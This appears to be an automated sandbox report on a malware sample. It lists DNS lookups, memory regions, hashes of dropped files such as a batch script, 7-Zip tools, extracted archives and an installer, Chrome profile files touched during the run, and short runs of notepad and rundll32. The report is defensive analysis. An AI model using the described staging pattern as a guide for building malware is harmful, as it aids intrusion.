US 8.8.8.8:53 2.203.240.157.in-addr.arpa udp
US 8.8.8.8:53 78.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 36.34.239.216.in-addr.arpa udp
US 8.8.8.8:53 157.71.125.74.in-addr.arpa udp
GB 172.217.16.227:443 www.google.co.uk udp
US 8.8.8.8:53 www.facebook.com udp
IT 157.240.203.35:443 www.facebook.com tcp
US 8.8.8.8:53 translate-pa.googleapis.com udp
US 8.8.8.8:53 35.203.240.157.in-addr.arpa udp
GB 142.250.200.42:443 udp

Files

memory/5104-5-0x00000000012D0000-0x0000000001326000-memory.dmp

memory/5104-8-0x00000000012D0000-0x0000000001326000-memory.dmp

memory/4180-7-0x00007FF7E0330000-0x00007FF7E0E5D000-memory.dmp

memory/5104-10-0x00000000012D0000-0x0000000001326000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe

MD5 b2e6a3d0bf3320b759c464ae6fa5b735
SHA1 cc9f5de7742b9c11f7c0c0e3f9d39b0c16b38cc1
SHA256 771b76ba28496c56d1d9c0fe67fdf7688a2f1b12a9eb428050551338945337a3
SHA512 bf2f09aebf6d4b07ec06ce37617361e149b26d7fc2f5c0715a5e479747eb5b1f8fc615c90d1e4d8d751e05dd566819facfef8a00cfb7acb61ec588b0c23b022a

memory/5104-15-0x00000000012D0000-0x0000000001326000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 893874465a8d9f68f0684fd61e9f1d3c
SHA1 866a58255ebab05d4ee2f2ed8383a6555ac1df03
SHA256 e0855b82ec99b14bdfa38dacf90dadb2071e0d413c6559c752e0b2c6e8cd08c0
SHA512 1cc878a3236a5ce4f3a89fae580b4d16a7842fd03dfe0a2c7d1d5da5be822528ea3826f659a70de727c9307fb15997f56b7204582043dc7efcc6c818f7aa2bd7

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 716459a6ceac7d310d4227ea3e9ddb59
SHA1 fa27addf18c197bf5fc054bfb5ae57de1caf3382
SHA256 ba5270891d3eef832fe34f9d67fbbb30ceb3873552ea859139914a6a783b0aa1
SHA512 3857cc099edd99f1c20d4c4456ec4577478afcbdb6073852c6df10775a4e6de0316ab68c6dacb7212d27f49057312ba1aeb0c35e695d84832f3e9f8d61f7d8c1

\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

MD5 a62944686498212b290eae637729a151
SHA1 2053660850d3f578f7b31e5ced16069d6f9c4ee0
SHA256 0bb07f0caab7e5539e7efeca5bee359d9f6b49237e0c908981d9168680fe2b3e
SHA512 ae6abd482552445cbf8c308948519227b0d1a82c1b3adb4800f8c9ac32c519c8d0aee8f3b4caada26d1976b63b032aad72d95e574adf205b947dada23a5b8ad3

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

MD5 870a5535c79edcf782551514f48d89ab
SHA1 333d814d65753cdc4c4e8fb587c09af6960110d1
SHA256 814a92267e0d8867932afd625f2f8e55b04b88b2cfc31e91b6e45e473f1b057d
SHA512 f8743ca2f1ef2433b41adc41adf6a5836c1901bda70d5d76301cb06b471796b360544efa591c49b3a7d09eee12cef7ba20e79571f50d891d4729598210772b06

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

MD5 6f7f4f7ed739e3ac5eee8d0876ff76d4
SHA1 9a65d52885624dc47f342b5a9875d7720540c755
SHA256 b61a321a8a1f4ca1d8c52a1ad0464ac5882073ac8da7c5585f04ce2330b78acc
SHA512 35cad901c3f77c58803372a2f230701469d99fb9d8b16d82b59416a62d215614ab044dcae123473cc5d9a4a09e23f2edaac53ef82bbd5b3556b9b187cff50021

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

MD5 4a5f569872c858ede1c0c67500cfdd6d
SHA1 cdcac69d89b45a7903198467c2d2d32126c31661
SHA256 88b2d9a82c911ad61f3570aa31b360ae1649b117f6495459698d724f0c9638dc
SHA512 d9c6776829def517a253e9c60d0316dbc03092f850383305089dc1110b1abd19668ae47dca8188e96c6f12b66a8e5b5a783901f2115cadd5c1accf019c3bdb40

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

MD5 a915fd2a4e2750ee9003e628294bf284
SHA1 f9adc1e65fc3d2cf39b2c5a89030f3225e21616d
SHA256 5e2e339dbee22d6c05d652646071bc81ad96a6422eb311453ca3905e7dfea285
SHA512 044d5370ec915fb488cf77c1b181f5a4f89833028266f922766b782ff445f61ab85b92980d6939d0e252a368eb846def27bcdea7f029999d6854a90c793b3a5f

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

MD5 18f4fe969c4ba0517b403e28f7ad2b72
SHA1 9df09751ee1246db2ed6b6ed6fec87fb0891e077
SHA256 06d1004f28a87b42b1d7ac23ff2e4b43d736295abc2e84740504386f40a041f4
SHA512 9847b8e2b849b09a76e22ab0d76a1a7d29079676dbdf4277b712709af0ac6a6f0e3a473f144f0a8e247861111357027a758b95e4d096d24cec160192c5da32a4

C:\Users\Admin\AppData\Local\Temp\main\extracted\Installer.exe

MD5 4265bf9f9535ebb4e1830e2a50589285
SHA1 ddc45fe277a3b39179dd9e39e17d71b50a184607
SHA256 c07698b4c960b60d8a3c661887d6cc1f7fe74e31a24d4c2ae95d52d1c92ce403
SHA512 3a7a0a8a6b82d5e1b6c06c12250eb9b347ed024811467d6da5123f6d07a79836a4e414758cb5c708d0c96cc4a020f8743b2c1e4fa5f5ed448fc087772ab592be

C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

MD5 6dd7f70cddc4310e047032d70550f72c
SHA1 e93c0d3a03dbe51eba117ea8e10bd0e8b6b27562
SHA256 e92508881b6d69c45897a58b4c7dc58ee68e438979604d7f7b6f6ff71f15444d
SHA512 1e6398a9739f57a3cf754a6e73f92cf67fe117440a6afe698767c578f396a4b8dab93b5568d02fa23fbcd3565b9017254625d58b1ea7a375c8537f2bab90f42c

memory/868-77-0x0000000000240000-0x000000000024C000-memory.dmp

memory/868-78-0x0000000005040000-0x000000000553E000-memory.dmp

memory/868-79-0x0000000004A90000-0x0000000004B22000-memory.dmp

memory/868-80-0x0000000004C10000-0x0000000004C1A000-memory.dmp

memory/868-81-0x0000000004CB0000-0x0000000004D16000-memory.dmp

memory/1192-84-0x0000000004970000-0x00000000049A6000-memory.dmp

memory/1192-85-0x00000000074E0000-0x0000000007B08000-memory.dmp

memory/1192-86-0x00000000073E0000-0x0000000007402000-memory.dmp

memory/1192-87-0x0000000007CF0000-0x0000000007D56000-memory.dmp

memory/1192-88-0x0000000007DD0000-0x0000000008120000-memory.dmp

memory/1192-89-0x0000000007BD0000-0x0000000007BEC000-memory.dmp

memory/1192-90-0x0000000008520000-0x000000000856B000-memory.dmp

memory/1192-91-0x00000000085F0000-0x0000000008666000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ybfkvbxl.3bg.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1192-108-0x00000000095B0000-0x00000000095E3000-memory.dmp

memory/1192-109-0x000000006F740000-0x000000006F78B000-memory.dmp

memory/1192-110-0x0000000009350000-0x000000000936E000-memory.dmp

memory/1192-115-0x0000000009790000-0x0000000009835000-memory.dmp

memory/1192-116-0x00000000098E0000-0x0000000009974000-memory.dmp

memory/1192-312-0x0000000009840000-0x000000000985A000-memory.dmp

memory/1192-317-0x0000000009670000-0x0000000009678000-memory.dmp

\??\pipe\crashpad_4332_UOQZPMJYURYHESBT

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

MD5 151fb811968eaf8efb840908b89dc9d4
SHA1 7ec811009fd9b0e6d92d12d78b002275f2f1bee1
SHA256 043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed
SHA512 83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 dba47117e58a4c95f60a693acfcd81d6
SHA1 1325a6e27ab2409ef24795c0e9bb777e8a05d044
SHA256 07fbb63934cc4eec4864b87029864c95298fcb35d017ac49e488585dff2b3bc5
SHA512 e6f7b71da72f71893bf590d43325078dbcfa202b6959a46fdfd933614ac4639af0bfb12d9859a684d82a753636b6dc9a546c47a3af4ff512ec08f5f83086e749

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 2269e6fb00d925f9b840301637d32b71
SHA1 02a04bd01cdd665982dc266aad21016fb647e27f
SHA256 360baaaa33627edf06eb04cc009fa056125214993426aeeb5dc51328e023c54b
SHA512 ea0b786f55f3733fef98ae2d71280001b1eb4827c0884e37ea6ac3a6def3d083df2568e0dbaa3e3b51f4da30eef8b1a8bfd9ba70ec5a8bec2f2ab1502024194d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 63864ed43e5004147163ad1f5c1701f6
SHA1 13d50dea98eca9481f4dacb518e8a8157a9f1c2a
SHA256 3fd036346ceff5464fa87948ab306d966f2ebae9f70f06d662f374b73c7fa9cc
SHA512 8db95e08010e03248914d2de7a906767b37711bd4af83c0969a0e5137d2fffb0cdfa97bf6867e769e4eb526cff82e4ae03c72e6ae117cd4711e6e2b88067dda0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 20f101bc2c6bc41e8f91fe5278c4056e
SHA1 546b4b194448147cc711b668ed969a211b3e675e
SHA256 7a617d4e4a0d9560cfd9e88bbda0f745d1a6a4b97b5ad18f0bd86ecc40958e9a
SHA512 dc79f749d57f3c2ee13ba680564fab29fb97ee85930a38db31f19bade08efe0f881695be69be40af224c4d91418aeadeb2ec977b662e40f514c6a01e55293ec6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 452b01aa9ffd717677accf05f8ae5528
SHA1 5db1aa50894c7a16c638ab796031bd17d2dbe7fe
SHA256 2195dd236c5b9ed6ca06fa47ae0cb39a403a30663c8ad1735e60b4cbab8fbb62
SHA512 177d66e0e2e88ca26d0ba91fdb7e45adc498b6177d1d8ea6e9d4f7062b963a1b9de6ec0ba3026eace8f3f423249aa3b3b114c873b16bb343f8af9e8ef5f51bd8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 acf07e6e6c18c7c3e0d1f3a444063acd
SHA1 83ca2e991993f8d5481cb8f864d10a6d5fab42a5
SHA256 14e9b05bbebe5a161c524fce5312e7ab4cc22bd664b9bd63087c138c75927492
SHA512 99c448d70ac5185970ec25eb00cfced17f53f8b2ad0a5bf22eee7cdfe93085b0123946f4e0bc6d6e18f4230b78361dc158c65a1c49252a72407b1f06450ebb8b

C:\Users\Admin\Downloads\Unconfirmed 378584.crdownload

MD5 f1320bd826092e99fcec85cc96a29791
SHA1 c0fa3b83cf9f9ec5e584fbca4a0afa9a9faa13ed
SHA256 ad12cec3a3957ff73a689e0d65a05b6328c80fd76336a1b1a6285335f8dab1ba
SHA512 c6ba7770de0302dd90b04393a47dd7d80a0de26fab0bc11e147bf356e3e54ec69ba78e3df05f4f8718ba08ccaefbd6ea0409857973af3b6b57d271762685823a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 f9963a1618d6458ee89ae77ac559c8e4
SHA1 a2b95ca3e9e0d9e5d564f4c04e6c193d35fa0101
SHA256 bd2bd0dbac571dc8000739d8f61d00a1c0682e44babad869a88c67c3cff8f44d
SHA512 1d7b4dc00d4a91300c6739a9012f3bf081603e3432a94cb0e49c263e05feefa6b227b1f4f7cc223c5d6228abd3c3fccfd743b6700c351b98386e810385a02209

\Program Files\7-Zip\7-zip.dll

MD5 8af282b10fd825dc83d827c1d8d23b53
SHA1 17c08d9ad0fb1537c7e6cb125ec0acbc72f2b355
SHA256 1c0012c9785c3283556ac33a70f77a1bc6914d79218a5c4903b1c174aaa558ca
SHA512 cb6811df9597796302d33c5c138b576651a1e1f660717dd79602db669692c18844b87c68f2126d5f56ff584eee3c8710206265465583de9ec9da42a6ed2477f8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 f9dc26704da07c4fb9b72d27e9f1268e
SHA1 5beb50fa7dcf9e01aacfe2515014f66510fb985b
SHA256 3881fb4c16119d039cba801214401ef4bc91c761453b59c72c5c1da23bcdde5c
SHA512 a5e11bc86897bcde36d4a641545504875f71dd7d465d1a6b5461c2ace78558737a2b4d67a8d1c6a2507fcc224cc76b632ad34d98ab5541acf99a8797767ec5eb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 4cf58c14f20b0346c58a758fa11bfd2f
SHA1 c142f1e2dd9cecd1de45e83859b294d1bad77229
SHA256 832a864e7b95e32c54c933b7767246b05fe3a7bc0b65ae7858833ffcc502e67d
SHA512 96f572683cd4cdce1654717cb1356fda9d3bb464b657e8a7dcbd20b28e34629cb688c3ad1bf225aef832018871440a6fe49971cbfb28fe8643d8f9645feb8867

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 a0a5ff2e6e9ef7d820ca42d09a660e8c
SHA1 fcb25c451672458b937480a286cd61970b58ba55
SHA256 27dd5ae1e86e4ed32fdebff38ed4332a040ce765141b014255377d0315a73a85
SHA512 8ea88314261582ff254a5b5885f440299fc8d98be5298b421a381e5d5974667c43ecced1de5aee617d8385ae64def9919f7305d4fc6938b9ac99a3a6cbf7dc5d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5a15ac.TMP

MD5 9dae7a25384a7bdd810b501544b77a94
SHA1 fc55bd5221171dc4e5853cdf3ab39fc3c7560617
SHA256 2db0c8d1e0fa0940af7f2e789d2baf8a0d8f12cc38ced16a9289d8ecf3587f16
SHA512 c33f0668e98e2637065bb0363a8713781749d89cfd424599ea4f5437280e00904a8b03eb07a0ae73afecc1ef24240fd6384d68f7e14fe90931bc02d53552bbf2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 93eeb0756fd70dfb396f659e8cf1b537
SHA1 0a2a5391c99e1a3aa230c24667abb645555ba8ba
SHA256 4ffe7d0b85352781f07c49ce8621aa417db3d2acc246ac5854ae369879852010
SHA512 1fd4cd9898a58e2faeb1d96c518b703a9936cc979afafb8aae21ebb6f5be00bac12838359f0c4c49bfb1eff29e1369986731ecc9f05561b326fb219bca5b6d82

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 ae1bccd6831ebfe5ad03b482ee266e4f
SHA1 01f4179f48f1af383b275d7ee338dd160b6f558a
SHA256 1b11047e738f76c94c9d15ee981ec46b286a54def1a7852ca1ade7f908988649
SHA512 baf7ff6747f30e542c254f46a9678b9dbf42312933962c391b79eca6fcb615e4ba9283c00f554d6021e594f18c087899bc9b5362c41c0d6f862bba7fb9f83038

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5a4bef.TMP

MD5 0619b3bedb6ecfbeb1af55458dea42e3
SHA1 68c3af847e49db57683339d1b768833f7f1e61be
SHA256 bbe84cbe0a63d7dd529b2511a12df1a5608be82bb24e0cd02d6bb92699ee3c09
SHA512 9319f1394a6b87a1f427a9b781dce42d7f68c8764062eec8d6500da9ea3e201e3775a1f92796d7f75f63b01223e8a325c769be993ac5fd359d5046fb29ad12e9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 34d4b17bd203ac807b6d7cde30599ac0
SHA1 fc497999b0a269d590317fd3aad1abd96d3a0472
SHA256 6b460670ad1c2c0f74c40b66aa24a0cbeebb0b0e95475758ad10911d0939369d
SHA512 dc545ecc2d6c6110a3b0e862097201fa5f0b86c1531a4c4c69b96bbc9e0f8ba5c6f6e9947964ed84c5c9726ff1ca8d3486162e8cbe8d37c77e1fba16aece5626

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 18bba9dd6808199233d001996193daf9
SHA1 dc5a01485d8334f560daad3555827327dca5e80c
SHA256 3e9ba9a4e528147effd37ad85a0cc100cfc61c5865d4134ab730ce4ad65c017f
SHA512 b4cb58c597f210db1467b4bc9b72c321b5f314e068cf9819aab875d0d1855109fe483869197bdc29070378161388a182110a43da6dc489235914e739227ca1b9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 149e5896f39ea962ee4e43e00cbb719d
SHA1 61f37f8c76443faf4818fdafd7a586d73da84e56
SHA256 7ce5e23f4bfe3c1c0088c614e5be6d55493a3c95bd3124fd94bce0ddfa6c4ce5
SHA512 b8011e37a38eb17935ded3237a87c53338752b0450315f03cd280a08b5917340933ca75ef4e7eef2f22efb8c715e538a288c9b0df5123c851f256fe8c83a239a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 dcd05c00279183de899bf36573e96657
SHA1 1c4dc09532b555ac6669fef9435adfb5e6ce6f51
SHA256 c59399f40fb66c2de27eee722f846dadeef42e1a65a536d309818ff2153c14b6
SHA512 25ccb0f0da41665a69264aa1a74566f198ac037cab105f9ec6f673c31b14f3d88b2b99e1f8c46249d738dba13179f4fdbe04a5ca6a67edd24cd424045a98939f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 a533dbee2b1018dda1d1d70c767981c1
SHA1 462c11a894b013cc853daf3f158f4e3fecf5f9cf
SHA256 ba5a4c65fbd05f92399cecb84f2eaf6855ca4d674a25a2a40c109214b2c1aae3
SHA512 d3283901ba2e26cb538bccb760b905137799c01b9a38d76a259557e6acfb4c4e051a74d8b86f10d8768b3f1cf704dc6a22623b9a9fc1bc367fa26cce9b94a197

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 42722595c5cf2cf703bf0b5b3e213d5a
SHA1 60b42e133740423754534db5ffd91df6762ac39d
SHA256 000e35848937e0132ed037079d0adb1a2b444db7f9866e442269f33efc2eaf15
SHA512 30e25f1d2f7798c46b0c4c7c2c54edc3a22b668cf69d9daf33885e90fbb10409e457c0ab616a87bfc91db95e9100c5e6bfd0899fdf602ca6a2a244931b9092a1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir4332_930806541\Icons Monochrome\16.png

MD5 a4fd4f5953721f7f3a5b4bfd58922efe
SHA1 f3abed41d764efbd26bacf84c42bd8098a14c5cb
SHA256 c659d57841bb33d63f7b1334200548f207340d95e8e2ae25aac7a798a08071a3
SHA512 7fcc1ca4d6d97335e76faa65b7cfb381fb722210041bdcd3b31b0f94e15dc226eec4639547af86ae71f311f52a956dc83294c2d23f345e63b5e45e25956b2691

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\0e6e2b7e-16cb-4d70-87a0-ac43d78a5e69\index-dir\the-real-index

MD5 fcb898b34dccc68f1f5744ed54552286
SHA1 2eaf8dcd42eb4a35fa6428450878b85a6c668e1d
SHA256 c9cd200684c671e5ed98b8e3e6361186b55380a4fb946336c6b1517a80567063
SHA512 1d5e2a01c1d3c24ff5d2f8a31f9b32459fae1fd6b446d177944c98ef717599f6fc5decb770edd43cf047b4d02981bee960b8d98cdeb28eafff0976f0af1fb597

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\0e6e2b7e-16cb-4d70-87a0-ac43d78a5e69\index-dir\the-real-index~RFe5a6831.TMP

MD5 6cfdd6c65dc3042708071429f7f63d49
SHA1 1ba1ca71fe378f2cf0563f504dc4a6d2157e5ec1
SHA256 bdc17775bd53acc6e492fb9e3b8111b73ab2fb6c79715eb62c517180090471d7
SHA512 cde1842e43d169025f218d94e9c1a1740972e9088e942eb07f24ca1198fbf166c4b9db3bd54b935b5739ada8a078bb71dd33fbb9d6df746ba227e7e83459058f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000022

MD5 cd3756106418d9e83a2baff9904ba221
SHA1 4c2ed1c1ebe119027db0fbaf7a64b408f1779b4a
SHA256 57ec0895e1bcaf08c769e2d6872f3f3657972f87fac081063445213dae4541ee
SHA512 5bf43ccaaf99505f7e8ecf2eda18efe260125accbc12f655601e2acabd822513e153f4b81cbf03a65d13572f11e9f13fd471006a0ce8f2665e8a594ff2d769dd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 b6076ddd0896c4ef07d9d907ec0ccffe
SHA1 83ef97d88f6ca25b1781587040ca676da4187228
SHA256 3137611b3a24ea83c7eff1df6226b4594b2da048759bbf7cf8f69505f9c4e773
SHA512 1140f45c628e1ac5f114f443fae946a08d86013fd5f05f2a1f2718df9346efb3b2eb02989119b49a92c4f69b7147aeae9c48827e23902c14965b6bad4c5d9e32

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\0e6e2b7e-16cb-4d70-87a0-ac43d78a5e69\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 e43b5a9489450c3a906ac4e5ec6d6edd
SHA1 c0b6511fb9a8b6aff4f152c792a98d31fcadcb07
SHA256 aa61cbed1515ade8c09e95bd423ca53e6b002388641e93996f01929b38795d0c
SHA512 6a88c8bba007dd9ec99cbbfee1e7bf40caf7c6e9a9f597e351656054fc3b06ed0a14f4b37c9015c50bdc47448623422e34b9dc02a5cfb98433016494166e40f8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 fc4387d666a2d5d88dd7f74c8f9d68b8
SHA1 06214eb04646b1904b6073e484ba222f161f37be
SHA256 a4d93d9aacd6b97422248a1dcdb7cf74bec3e4ba58e6397e2c17a8137085fd8b
SHA512 ae228fb9c460f4a435485322a57d7a54d1be8c8ddc759666368959bd9c505c6e316f035c059ef3c04d10cd32db434947bf5cf5904658c8a0393b80af7c6d83ed

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 87aef95f72269523be9295d2b6d91147
SHA1 48bd563631f121b991ee40998c6bf7979b5326f0
SHA256 5050093b05eeafccae81c6a349499cab79989997e04f01338fb258afda5e48ac
SHA512 775ea3909c57003b3f7448abb1f7c186127fb429b9c863f8a9001e818ff6227fe51e1d2e941344295d0b9e8045d10477a5c03284d9726db797fa1d79306bb86d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001f

MD5 c0637a08f2ba40c56260782d2bb3ace4
SHA1 a2bf4298414a764ff1342b3f48f45b4dc1669a96
SHA256 d6ab12688ec8cfe7f9235b18c7d7a4730d86278ba1efae0d715c0d054465781e
SHA512 736d1ac8987102028baef59d43ceb2fde71b3aab2f8f2d8d306846a457e2ac224908968ff7bfe34bb05beb7998223d393244cf5da84f9d64f8b71c9f0b2ca6e2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000021

MD5 af5bf693b92c0d2c8441b3a6640c4ad8
SHA1 12ed4ac73239e542ab8d7fa191dddc779808e202
SHA256 b9f2c3f2ec75955d96309f759eaf9fb6bf576c238377491dbb92de1768a26012
SHA512 c2ef099832fc5e8f1e67acbd550b0590c0fb5c291761280a2e74e6a97763906b9c0c1a2295f285462ba3a0ed7cd5658f296e5f0f9c5d11a97ba210f352f8a438

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001c

MD5 127b7a9f7009939d0ae5dd1a48386985
SHA1 f9e981f2fbc6df7e304803153fb6fe40f0dcb6ac
SHA256 9d8e3219c036313e8b27ecb7b91befc49de6a32352a5349656945a7525a89962
SHA512 b1a442d78f6adc7a67f8ee299d46817309798ff2a38a66af2ff03eaa276b3a7967fde34e801dc8488ed75b3110fd01b3a9763f792ce75e21fae190d4779c1287

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 f59459fcda8df0c834f4ab23336c96e7
SHA1 e2c5ce89cd38fdab552008015426fdca30f15c07
SHA256 96c32d5c4b8c6c59713aaac3f3d43ddfcd37ddf548feffbc75b1d1fd21dba1cb
SHA512 f0498022c2d5a66f66088390ba793df030bbdf614f723b3038e624992fac1c19c36a61177d5893e8da046e6a7fa1315f263789fb534a5190439466f5d763f8c1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 7109a0b4eb6d946ff017179aa1387fbc
SHA1 ad6d5de96c35028c4350b7d1b39e28b0b9a1c0f1
SHA256 a4c4ed07cf8c104977ff5d6d45d57e746fc067528a8e2b51e6affd9393f16939
SHA512 17d211bc4aab2bc82429955e6e77caf7ac4e48420b7fd70eda9f19713d24d4f42f92957b052586bea75519a77b81c72604dd8a5fa0b29dca15aafee1f6f0fd6d

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-05 16:09

Reported

2024-07-05 16:14

Platform

win10-20240404-en

Max time kernel

132s

Max time network

136s

Command Line

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Settings.ini

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Settings.ini

Network

Country Destination Domain Proto
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 121.150.79.40.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-05 16:09

Reported

2024-07-05 16:14

Platform

win10-20240404-en

Max time kernel

133s

Max time network

136s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3d9xx.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

